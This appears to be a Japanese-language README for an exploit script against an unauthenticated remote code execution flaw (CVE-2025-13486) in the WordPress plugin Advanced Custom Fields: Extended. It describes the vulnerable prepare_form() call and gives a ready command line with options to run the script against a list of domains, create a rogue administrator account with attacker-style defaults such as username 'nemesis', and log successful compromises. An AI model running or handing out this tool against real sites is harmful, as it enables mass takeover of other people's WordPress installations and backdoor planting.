
The Advanced Custom Fields: Extended plugin for WordPressは、バージョン0.9.0.5から0.9.1.1において、prepare_form()関数を介したリモートコード実行(Remote Code Execution)の脆弱性の影響を受けます。
WordPress 向けプラグイン Advanced Custom Fields: Extended は、バージョン 0.9.0.5 から 0.9.1.1 において、prepare_form() 関数を介したリモートコード実行の脆弱性の影響を受けます。これは、この関数がユーザー入力を受け入れ、その入力を call_user_func_array() に渡すことに起因します。これにより、未認証の攻撃者がサーバー上で任意のコードを実行できるようになり、バックドアの埋め込みや新しい管理者ユーザーアカウントの作成に悪用される可能性があります。
コマンドラインからスクリプトを実行します:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Single target WordPress site URL
-l yourlist.txt
File containing list of domains/URLs
--email, --email EMAIL
Email to set
--user USERNAME
Username to create (default: nemesis)
--password PASSWORD
Password to set (default: Warga@Sipil1337)
-o output.txt
Output file to save successful results (default: success_results.txt)